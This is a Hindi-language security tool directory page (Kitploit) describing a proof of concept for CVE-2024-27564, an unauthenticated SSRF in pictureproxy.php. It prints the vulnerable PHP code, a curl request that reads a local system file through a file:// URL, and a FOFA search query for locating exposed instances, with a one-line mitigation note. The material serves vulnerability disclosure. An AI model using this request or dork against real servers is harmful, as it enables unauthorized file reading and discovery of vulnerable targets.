Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-27564 — CVE-2024-27564 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो pictureproxy.php में url पैरामीटर के माध्यम से एक अनऑथेंटिकेटेड SSRF है, जिसमें कमजोर कोड, curl PoC, और शमन नोट्स शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/babydessy/cve-2024-27564
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेपर और शोध
GitHubbabydessy/cve-2024-27564

CVE-2024-27564

CVE-2024-27564 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो pictureproxy.php में url पैरामीटर के माध्यम से एक अनऑथेंटिकेटेड SSRF है, जिसमें कमजोर कोड, curl PoC, और शमन नोट्स शामिल हैं।

रिपॉजिटरी देखें
332 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-27564

विवरण:

pictureproxy.php में एक भेद्यता है जो दूरस्थ हमलावरों को url पैरामीटर में URL इंजेक्ट करके मनमाने अनुरोध करने की अनुमति देती है। यह SSRF भेद्यता प्रमाणीकरण के बिना शोषित की जा सकती है, जो इसे विशेष रूप से खतरनाक बनाती है।

भेद्य कोड pictureproxy.php फ़ाइल में है। यह समस्या इसलिए होती है क्योंकि फ़ंक्शन url पैरामीटर को ठीक से मान्य नहीं करता है। $_GET['url'] वेरिएबल को file_get_contents() फ़ंक्शन में पास किया जाता है, जो निर्दिष्ट URL से सामग्री प्राप्त करता है। यह SSRF का कारण बन सकता है।

PoC:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Curl अनुरोध:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

डोर्किंग:

FOFA= "title="ChatGPT个人专用版""

शमन:

इनपुट सत्यापन का उचित प्रबंधन आवश्यक है।

टूल डाउनलोड करें